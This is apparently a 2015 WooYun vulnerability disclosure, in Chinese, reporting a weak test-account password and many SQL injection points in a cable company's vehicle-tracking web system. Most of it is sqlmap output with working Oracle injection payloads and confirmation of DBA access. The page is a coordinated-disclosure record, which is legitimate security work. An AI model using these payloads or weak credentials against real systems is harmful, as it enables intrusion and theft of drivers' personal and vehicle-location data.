当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142312

漏洞标题:歌华有线车辆定位系统存在弱口令及多处SQL注入打包(可监控数百车辆+用户信息+DBA权限)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-22 09:51

修复时间:2015-11-08 15:58

公开时间:2015-11-08 15:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

本来以为登录注入框被修复注入不了了,没想到从一个弱口令开始了SQL注入旅程!~~~

详细说明:

PS:
在提交完的后,发现该弱密码用户被改了密码了!~~~
不过登录进去后的注入点还是在的!~~~
1、弱口令登录

**.**.**.**/


test 111111
2、cookie存在注入
用test账户登录后,刷新页面抓包,cookie存在注入。company_id参数存在注入
--dbms "Oracle"
似乎登录了才能测试到,在登录框测试中cookie中的参数注入不到。
上sqlmap测试结果如下,DBA权限。
而且都是弱口令哦,这里我就不多说了,管理员自查吧!~~~
还有其他的数据库,就不继续测试了,点到为止!~~~

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


3、get注入
依旧是company_id参数,同样是刷新页面抓包得到!~~~

**.**.**.**/motor_api/motor_ajax_baidu_latlng.php?company_id=1970 (POST)
rand=0.3906304221848003


[23:07:17] [INFO] heuristic (basic) test shows that GET parameter 'company_id' m
ight be injectable (possible DBMS: 'Oracle')
[23:07:17] [INFO] testing for SQL injection on GET parameter 'company_id'
[23:07:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:07:18] [WARNING] reflective value(s) found and filtering out
[23:07:28] [INFO] GET parameter 'company_id' seems to be 'AND boolean-based blin
d - WHERE or HAVING clause' injectable
[23:07:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:07:28] [INFO] GET parameter 'company_id' is 'Oracle AND error-based - WHERE
or HAVING clause (XMLType)' injectable
[23:07:28] [INFO] testing 'Oracle inline queries'
[23:07:28] [INFO] testing 'Oracle AND time-based blind'
[23:07:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:07:33] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[23:07:34] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[23:07:35] [INFO] target URL appears to have 4 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
GET parameter 'company_id' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N] y
sqlmap identified the following injection points with a total of 68 HTTP(s) requ
ests:
---
Place: GET
Parameter: company_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: company_id=1970' AND 7340=7340 AND 'qZZA'='qZZA
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: company_id=1970' AND 4090=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(122)||CHR(117)||CHR(103)||CHR(113)||(SELECT (CASE WHEN (4090=4090)
THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(118)||CHR(114)||CHR(113)|
|CHR(62))) FROM DUAL) AND 'ZTrA'='ZTrA
---
[23:07:54] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:08:26] [INFO] fetching current user
[23:08:27] [WARNING] reflective value(s) found and filtering out
[23:08:27] [INFO] retrieved: SHMOTO
current user:    'SHMOTO'
[23:08:27] [INFO] fetching current database
[23:08:27] [INFO] resumed: SHMOTO
[23:08:27] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[23:08:27] [INFO] testing if current user is DBA
current user is DBA:    True


4、注入点三:
看看抓包情况
车辆基本信息之
车辆列表:

**.**.**.**/device_list_text.php?chepaihao=1&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%AF
%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=TCD_CAR_MODEL&cck%5B%5D=TCD_DRIVER&cck%5B
%5D=TCD_DRIVER_MOBILE&cck%5B%5D=TCD_BUYCARTIME&cck%5B%5D=TCD_INSUREENDTIME&cck%5B
%5D=TCD_CHEWEIINFO&cck%5B%5D=TCD_CAR_TYPE&cck%5B%5D=TCI_COMPANY_NAME&cck%5B
%5D=TCH_BIAOSHI&cck%5B%5D=DISTRICT_NUM&cck%5B%5D=TIME&cck%5B%5D=IMEI&cck%5B%5D=SIM


chepaihao、driver均存在注入
回车管理(test帐号没有权限)
车辆保养

**.**.**.**/alarm_baoyang.php?chepaihao=1&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2


chepaihao、driver均存在注入

sqlmap identified the following injection points with a total of 393 HTTP(s) req
uests:
---
Place: GET
Parameter: chepaihao
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: chepaihao=1%' AND 1446=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(105)||CHR(111)||CHR(103)||CHR(113)||(SELECT (CASE WHEN (1446=1446) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(119)||CHR(115)||CHR(113)||CH
R(62))) FROM DUAL) AND '%'='&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2
&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_MOBI
LE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=TCD_C
AR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TIME&c
ck[]=IMEI&cck[]=SIM
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1%' AND 7948=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(104)|
|CHR(116)||CHR(109),5) AND '%'='&driver=2&company_level=1970&sub1=%E6%9F%A5%E8%A
F%A2&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_
MOBILE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=T
CD_CAR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TI
ME&cck[]=IMEI&cck[]=SIM
Place: GET
Parameter: driver
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: chepaihao=1&driver=2%' AND 7689=(SELECT UPPER(XMLType(CHR(60)||CHR(
58)||CHR(113)||CHR(105)||CHR(111)||CHR(103)||CHR(113)||(SELECT (CASE WHEN (7689=
7689) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(119)||CHR(115)||CHR
(113)||CHR(62))) FROM DUAL) AND '%'='&company_level=1970&sub1=%E6%9F%A5%E8%AF%A2
&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_MOBI
LE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=TCD_C
AR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TIME&c
ck[]=IMEI&cck[]=SIM
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1&driver=2%' AND 6850=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)|
|CHR(107)||CHR(109)||CHR(82),5) AND '%'='&company_level=1970&sub1=%E6%9F%A5%E8%A
F%A2&cck[]=TCD_CAR_NUMBER&cck[]=TCD_CAR_MODEL&cck[]=TCD_DRIVER&cck[]=TCD_DRIVER_
MOBILE&cck[]=TCD_BUYCARTIME&cck[]=TCD_INSUREENDTIME&cck[]=TCD_CHEWEIINFO&cck[]=T
CD_CAR_TYPE&cck[]=TCI_COMPANY_NAME&cck[]=TCH_BIAOSHI&cck[]=DISTRICT_NUM&cck[]=TI
ME&cck[]=IMEI&cck[]=SIM
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: chepaihao, type: Single quoted string (default)
[1] place: GET, parameter: driver, type: Single quoted string
[q] Quit
> 0
[23:42:24] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:42:24] [INFO] fetching current user
[23:42:25] [INFO] retrieved: SHMOTO
current user:    'SHMOTO'
[23:42:25] [INFO] fetching current database
[23:42:25] [INFO] resumed: SHMOTO
[23:42:25] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[23:42:25] [INFO] testing if current user is DBA
current user is DBA:    True


5、注入点四:
报警数据之
超速报警:

**.**.**.**/alarm_speed.php?chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-
03&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=CREATETIME&cck
%5B%5D=SPEED&cck%5B%5D=TCD_SPEED_SETTING&cck%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCD_DRIVER&cck
%5B%5D=TCD_DRIVER_MOBILE


越界报警:

**.**.**.**/alarm_range.php?driver=1&starttime=2015-09-02&endtime=2015-09-
02&company_id=1970&chepaihao=2&sub1=%E6%90%9C%E7%B4%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B
%5D=CREATETIME&cck%5B%5D=FORB_CONTENT&cck%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCD_DRIVER&cck
%5B%5D=TCD_DRIVER_MOBILE


回车报警:

**.**.**.**/alarm_stop.php?chepaihao=1&driver=2&starttime=2015-09-16&endtime=2015-09-
17&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck%5B%5D=TCD_CAR_NUMBER&cck%5B%5D=CREATETIME&cck
%5B%5D=TCI_COMPANY_NAME&cck%5B%5D=TCD_DRIVER&cck%5B%5D=TCD_DRIVER_MOBILE&cck%5B
%5D=TCH_BIAOSHI&cck%5B%5D=FORB_CONTENT


chepaihao、driver、starttime、endtime、company_id均存在注入

[23:46:55] [INFO] target URL is stable
[23:46:55] [INFO] testing if GET parameter 'chepaihao' is dynamic
[23:46:55] [WARNING] GET parameter 'chepaihao' does not appear dynamic
[23:46:55] [INFO] heuristic (basic) test shows that GET parameter 'chepaihao' mi
ght be injectable (possible DBMS: 'Oracle')
[23:46:55] [INFO] testing for SQL injection on GET parameter 'chepaihao'
[23:46:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:46:56] [WARNING] reflective value(s) found and filtering out
[23:47:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:47:07] [INFO] GET parameter 'chepaihao' is 'Oracle AND error-based - WHERE o
r HAVING clause (XMLType)' injectable
[23:47:07] [INFO] testing 'Oracle inline queries'
[23:47:07] [INFO] testing 'Oracle AND time-based blind'
[23:47:07] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[23:47:28] [INFO] GET parameter 'chepaihao' seems to be 'Oracle AND time-based b
lind' injectable
[23:47:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:47:28] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[23:47:41] [INFO] target URL appears to be UNION injectable with 1 columns
GET parameter 'chepaihao' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[23:47:45] [INFO] testing if GET parameter 'driver' is dynamic
[23:47:46] [WARNING] GET parameter 'driver' does not appear dynamic
[23:47:46] [INFO] heuristic (basic) test shows that GET parameter 'driver' might
 be injectable (possible DBMS: 'Oracle')
[23:47:46] [INFO] testing for SQL injection on GET parameter 'driver'
[23:47:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:47:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:47:58] [INFO] GET parameter 'driver' is 'Oracle AND error-based - WHERE or H
AVING clause (XMLType)' injectable
[23:47:58] [INFO] testing 'Oracle inline queries'
[23:47:58] [INFO] testing 'Oracle AND time-based blind'
[23:48:18] [INFO] GET parameter 'driver' seems to be 'Oracle AND time-based blin
d' injectable
[23:48:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'driver' is vulnerable. Do you want to keep testing the others (if
 any)? [y/N] y
[23:48:31] [INFO] testing if GET parameter 'starttime' is dynamic
[23:48:32] [WARNING] GET parameter 'starttime' does not appear dynamic
[23:48:32] [INFO] heuristic (basic) test shows that GET parameter 'starttime' mi
ght be injectable (possible DBMS: 'Oracle')
[23:48:32] [INFO] testing for SQL injection on GET parameter 'starttime'
[23:48:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:36] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:48:37] [INFO] GET parameter 'starttime' is 'Oracle AND error-based - WHERE o
r HAVING clause (XMLType)' injectable
[23:48:37] [INFO] testing 'Oracle inline queries'
[23:48:37] [INFO] testing 'Oracle AND time-based blind'
[23:48:58] [INFO] GET parameter 'starttime' seems to be 'Oracle AND time-based b
lind' injectable
[23:48:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'starttime' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[23:49:06] [INFO] testing if GET parameter 'endtime' is dynamic
[23:49:06] [WARNING] GET parameter 'endtime' does not appear dynamic
[23:49:06] [INFO] heuristic (basic) test shows that GET parameter 'endtime' migh
t be injectable (possible DBMS: 'Oracle')
[23:49:06] [INFO] testing for SQL injection on GET parameter 'endtime'
[23:49:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:49:11] [INFO] GET parameter 'endtime' is 'Oracle AND error-based - WHERE or
HAVING clause (XMLType)' injectable
[23:49:11] [INFO] testing 'Oracle inline queries'
[23:49:11] [INFO] testing 'Oracle AND time-based blind'
[23:49:31] [INFO] GET parameter 'endtime' seems to be 'Oracle AND time-based bli
nd' injectable
[23:49:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'endtime' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] y
[23:49:40] [INFO] testing if GET parameter 'company_id' is dynamic
[23:49:40] [WARNING] GET parameter 'company_id' does not appear dynamic
[23:49:40] [INFO] heuristic (basic) test shows that GET parameter 'company_id' m
ight be injectable (possible DBMS: 'Oracle')
[23:49:40] [INFO] testing for SQL injection on GET parameter 'company_id'
[23:49:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:49:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[23:49:49] [INFO] testing 'Oracle inline queries'
[23:49:49] [INFO] testing 'Oracle AND time-based blind'
[23:50:09] [INFO] GET parameter 'company_id' seems to be 'Oracle AND time-based
blind' injectable
[23:50:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:50:16] [INFO] checking if the injection point on GET parameter 'company_id'
is a false positive
GET parameter 'company_id' is vulnerable. Do you want to keep testing the others
 (if any)? [y/N] n
sqlmap identified the following injection points with a total of 252 HTTP(s) req
uests:
---
Place: GET
Parameter: company_id
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03&compan
y_id=1970' AND 1087=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(114)||CHR(116)||CHR(
84),5) AND 'lOTO'='lOTO&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREAT
ETIME&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVE
R&cck[]=TCD_DRIVER_MOBILE
Place: GET
Parameter: chepaihao
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: chepaihao=1%' AND 9200=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(
113)||CHR(112)||CHR(109)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (9200=9200) THE
N 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(103)||CHR(117)||CHR(101)||CHR(113)||CH
R(62))) FROM DUAL) AND '%'='&driver=2&starttime=2015-09-01&endtime=2015-09-03&co
mpany_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&cck[
]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[]=TC
D_DRIVER_MOBILE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1%' AND 6894=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(105)|
|CHR(104)||CHR(108),5) AND '%'='&driver=2&starttime=2015-09-01&endtime=2015-09-0
3&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&
cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[
]=TCD_DRIVER_MOBILE
Place: GET
Parameter: endtime
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03' AND 8
276=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(109)||CHR(11
6)||CHR(113)||(SELECT (CASE WHEN (8276=8276) THEN 1 ELSE 0 END) FROM DUAL)||CHR(
113)||CHR(103)||CHR(117)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'PVWP'='P
VWP&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIM
E&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cc
k[]=TCD_DRIVER_MOBILE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1&driver=2&starttime=2015-09-01&endtime=2015-09-03' AND 1
480=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(118)||CHR(111)||CHR(98),5) AND 'Mwlh
'='Mwlh&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREAT
ETIME&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVE
R&cck[]=TCD_DRIVER_MOBILE
Place: GET
Parameter: starttime
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: chepaihao=1&driver=2&starttime=2015-09-01' AND 8085=(SELECT UPPER(X
MLType(CHR(60)||CHR(58)||CHR(113)||CHR(112)||CHR(109)||CHR(116)||CHR(113)||(SELE
CT (CASE WHEN (8085=8085) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(103)||CHR
(117)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND 'vVdE'='vVdE&endtime=2015-09
-03&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIM
E&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cc
k[]=TCD_DRIVER_MOBILE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1&driver=2&starttime=2015-09-01' AND 7943=DBMS_PIPE.RECEI
VE_MESSAGE(CHR(114)||CHR(114)||CHR(81)||CHR(83),5) AND 'qKtt'='qKtt&endtime=2015
-09-03&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATE
TIME&cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER
&cck[]=TCD_DRIVER_MOBILE
Place: GET
Parameter: driver
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: chepaihao=1&driver=2%' AND 7040=(SELECT UPPER(XMLType(CHR(60)||CHR(
58)||CHR(113)||CHR(112)||CHR(109)||CHR(116)||CHR(113)||(SELECT (CASE WHEN (7040=
7040) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(103)||CHR(117)||CHR(101)||CHR
(113)||CHR(62))) FROM DUAL) AND '%'='&starttime=2015-09-01&endtime=2015-09-03&co
mpany_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&cck[
]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[]=TC
D_DRIVER_MOBILE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: chepaihao=1&driver=2%' AND 9809=DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)|
|CHR(109)||CHR(84)||CHR(107),5) AND '%'='&starttime=2015-09-01&endtime=2015-09-0
3&company_id=1970&sub1=%E6%90%9C%E7%B4%A2&cck[]=TCD_CAR_NUMBER&cck[]=CREATETIME&
cck[]=SPEED&cck[]=TCD_SPEED_SETTING&cck[]=TCI_COMPANY_NAME&cck[]=TCD_DRIVER&cck[
]=TCD_DRIVER_MOBILE
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: chepaihao, type: Single quoted string (default)
[1] place: GET, parameter: driver, type: Single quoted string
[2] place: GET, parameter: starttime, type: Single quoted string
[3] place: GET, parameter: endtime, type: Single quoted string
[4] place: GET, parameter: company_id, type: Single quoted string
[q] Quit
> 0
[23:50:44] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:50:44] [INFO] fetching current user
[23:50:45] [INFO] retrieved: SHMOTO
current user:    'SHMOTO'
[23:50:45] [INFO] fetching current database
[23:50:45] [INFO] resumed: SHMOTO
[23:50:45] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[23:50:45] [INFO] testing if current user is DBA
current user is DBA:    True


6、注入点五
统计报表之:
车辆里程油耗:

**.**.**.**/tongji_mile_all.php?day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1&sub1=
%E6%90%9C%E7%B4%A2


day1、day2、chepaihao存在注入

sqlmap identified the following injection points with a total of 217 HTTP(s) req
uests:
---
Place: GET
Parameter: day1
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: day1=2015-09-18' AND 9093=9093 AND 'Rlpb'='Rlpb&day2=2015-09-19&com
pany_id=1970&chepaihao=1&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: day1=2015-09-18' AND 1042=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(104)||CHR(99)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (1042=1042) T
HEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(103)||CHR(101)||CHR(113)||C
HR(62))) FROM DUAL) AND 'iFGe'='iFGe&day2=2015-09-19&company_id=1970&chepaihao=1
&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: day1=2015-09-18' AND 4052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(110)||CHR(1
20)||CHR(78)||CHR(78),5) AND 'iOma'='iOma&day2=2015-09-19&company_id=1970&chepai
hao=1&sub1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: chepaihao
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1%' AND 8
535=8535 AND '%'='&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1%' AND 4
817=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(104)||CHR(99)||CHR(106
)||CHR(113)||(SELECT (CASE WHEN (4817=4817) THEN 1 ELSE 0 END) FROM DUAL)||CHR(1
13)||CHR(99)||CHR(103)||CHR(101)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='&sub1=
%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: day1=2015-09-18&day2=2015-09-19&company_id=1970&chepaihao=1%' AND 2
828=DBMS_PIPE.RECEIVE_MESSAGE(CHR(81)||CHR(77)||CHR(81)||CHR(83),5) AND '%'='&su
b1=%E6%90%9C%E7%B4%A2
Place: GET
Parameter: day2
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: day1=2015-09-18&day2=2015-09-19' AND 9339=9339 AND 'FiKs'='FiKs&com
pany_id=1970&chepaihao=1&sub1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: day1=2015-09-18&day2=2015-09-19' AND 1172=(SELECT UPPER(XMLType(CHR
(60)||CHR(58)||CHR(113)||CHR(104)||CHR(99)||CHR(106)||CHR(113)||(SELECT (CASE WH
EN (1172=1172) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(103)||CHR(1
01)||CHR(113)||CHR(62))) FROM DUAL) AND 'DZyH'='DZyH&company_id=1970&chepaihao=1
&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: day1=2015-09-18&day2=2015-09-19' AND 4542=DBMS_PIPE.RECEIVE_MESSAGE
(CHR(65)||CHR(115)||CHR(105)||CHR(88),5) AND 'akOs'='akOs&company_id=1970&chepai
hao=1&sub1=%E6%90%9C%E7%B4%A2
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: day1, type: Single quoted string (default)
[1] place: GET, parameter: day2, type: Single quoted string
[2] place: GET, parameter: chepaihao, type: Single quoted string
[q] Quit
> 0
[23:55:10] [INFO] the back-end DBMS is Oracle
web application technology: PHP 5.3.28
back-end DBMS: Oracle
[23:55:10] [INFO] fetching current user
[23:55:10] [INFO] retrieved: SHMOTO
current user:    'SHMOTO'
[23:55:10] [INFO] fetching current database
[23:55:10] [INFO] resumed: SHMOTO
[23:55:10] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SHMOTO'
[23:55:10] [INFO] testing if current user is DBA
current user is DBA:    True


分组里程油耗:(POST数据)

**.**.**.**/tongji_mile.php (POST)
day1=2015-09-18&day2=2015-09-19&sub1=%E6%90%9C%E7%B4%A2


同样day1、day2存在注入

sqlmap identified the following injection points with a total of 129 HTTP(s) req
uests:
---
Place: POST
Parameter: day1
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: day1=2015-09-18' AND 3214=3214 AND 'gJvU'='gJvU&day2=2015-09-19&sub
1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: day1=2015-09-18' AND 1021=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||C
HR(113)||CHR(113)||CHR(110)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1021=1021)
THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(117)||CHR(121)||CHR(119)||CHR(113)|
|CHR(62))) FROM DUAL) AND 'cZik'='cZik&day2=2015-09-19&sub1=%E6%90%9C%E7%B4%A2
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: day1=2015-09-18' AND 2755=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(10
6)||CHR(74)||CHR(79),5) AND 'PAWt'='PAWt&day2=2015-09-19&sub1=%E6%90%9C%E7%B4%A2
Place: POST
Parameter: day2
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: day1=2015-09-18&day2=2015-09-19' AND 1146=1146 AND 'DACt'='DACt&sub
1=%E6%90%9C%E7%B4%A2
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: day1=2015-09-18&day2=2015-09-19' AND 2080=(SELECT UPPER(XMLType(CHR
